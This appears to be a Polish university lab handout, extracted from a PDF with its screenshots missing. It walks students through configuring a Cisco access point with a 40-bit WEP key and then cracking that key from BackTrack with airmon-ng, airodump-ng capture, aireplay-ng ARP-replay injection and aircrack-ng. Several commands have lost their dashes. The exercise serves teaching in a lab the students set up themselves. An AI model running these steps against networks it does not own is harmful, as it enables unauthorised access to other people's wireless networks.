Do wykonania ćwiczenia będą potrzebne dwa komputery wyposażone w bezprzewodowe karty sieciową oraz jeden Access Point. 1. Do interfejsu sieciowego komputera, z uruchomionym systemem Windows XP podłącz przy pomocy kabla crossowego Acces Point CISCO (AP). 2. Ustaw adres IP 10.0.0.2 na interfejsie do którego został podłączony AP. 3. Za pomocą przeglądarki internetowej zaloguj się do panelu administracyjnego AP. Standardowy adres panelu to: 10.0.0.1. Domyślna nazwa użytkownika to: Cisco oraz hasło: Cisco. 4. Następnie wybieramy z bocznego menu pozycję Express Set-Up. EXPRESS SET-UP 5. Wpisujemy nazwę APX (gdzie X jest numerem komputera w pracowni) i ustawiamy tryb pracy Acces Point na interfejsie radiowym B lub G (w zależności od dostępności). Zapamiętujemy ustawienia przyciskiem Apply. Strona 1
Nazwa Opcja Acces Point dla interfejsu 802.11B 6. Przechodzimy do pozycji Express Security. Wybieramy standard szyfrowania WEP. Ustawiamy opcję Static WEP Key, wybieramy nr klucza 1 i jego długość na 40 bitów (pełna długość klucza będzie zawierać jeszcze 26 bitów wektora inicjującego IVS łącznie 64 bity). Jako klucz należy wpisać 10 znaków np. 1234567890. Zapamiętujemy ustawienia przyciskiem Apply. EXPRESS SECURITY Standard szyfrowania Parametry klucza Strona 2
7. Wybieramy pozycję menu Network Inerfaces i sprawdzamy czy skonfigurowany (B lub G) interfejs radiowy AP ma status Enabled. 8. Wybieramy po lewej nazwę interfejsu radiowego dla którego będziemy zmieniać kanał (B lub G), a następnie zakładkę Settings. Należy ustawić właściwy kanał radiowy dla interfejsu. Numery kanałów muszą być inne dla poszczególnych AP w pracowni. Zapamiętujemy ustawienia przyciskiem Apply i ponownie sprawdzamy status urządzenia. Strona 3
Network Inerfaces Nr kanału radiowego 9. Połączyć się z komputera z Widnowsem XP z AP. Podłączyć AP do sieci w pracowni. 10. Na komputerze z zainstalowaną kartą sieciową WiFi CISCO uruchamiamy interfejs radiowy i sprawdzamy jakie sieci są dostępne. Sprawdzamy parametry naszego celu ten krok można wykonać również narzędziami obecnymi w systemie LINUX. Należy zanotować parametry naszego celu: SSID, MAC i kanał na którym nadaje. Przydatny będzie również MAC naszej stacji. Strona 4
11. Do stacji komputera wyposażonego w kartę WiFi CISCO wkładamy płytę z dystrybucją Back Track i restartujemy komputer. O ile jest to możliwe, uruchamiamy system w trybie graficznym. 12. W systemie Back Track uruchamiamy konsolę i za pomocą polecenia iwconfig sprawdzamy aktywny interfejs skojarzony z WiFi. 13. 14. Wykonujemy polecenia 15. Ifconfig wifi0 up uruchamiamy interfejs fizyczny 16. Ifconfig sprawdzamy czy działa Strona 5
17. Ifconfig wifi0 promisc włączamy kartę w Promise mode 18. iwconfig wifi0 mode monitor wystąpi error jednak w tym momencie komputer stworzy wirtualny interfejs z trybem monitora 19. airmon-ng start wifi0 [kanał na którym nasłuchujemy] zoibaczymy interfejs ath1 z trybem monitor 20. Teraz możemy rozpocząć właściwy atak. Wpisujemy w konsoli polecenie airodump-ng -ivs w <NazwaPliku> --channel <kalał> -i <interfejs> I rozpoczynamy pobieranie pakietów. Zapisujemy je do pliku, którego nazwę podaliśmy w poleceniu. Strona 6
21. Podłączamy się stacją roboczą i generujemy ruch. Jeżeli ruch będzie niewystarczający to robimy punkt 23. 22. Otwieramy kolejną konsolę i rozpoczynamy atak arpreplay wstrzykiwanie pakietów. aireplay-ng arpreplay b <MAC punktu AP> -h < MAC stacji> <interfejs> Strona 7
Czekamy kilka minut ( w zależności od ruchu w sieci ) by zebrać odpowiednią ilość pakietów. 23. Po zebraniu dostatecznej liczby pakietów, w kolejnej konsoli, rozpoczynamy łamanie hasła atak WPT. aircrack-ng a WEP b < MAC punktu AP> -n <DługośćKlucza> <NazwaPliku- 01.ivs> Strona 8
Strona 9
Warto przedtem sprawdzić jaką pełną nazwę otrzymał nasz plik *.ivs ( ls la ) Jeżeli proces zakończy się takim komunikatem, należy kontynuować skanowanie, by zebrać wymaganą ilość pakietów testowych. Strona 10
Używając uzyskanych danych logujemy się do stacji AP. Wynik powinien wyglądać tak Jak widać klucz to 1234567890 Strona 11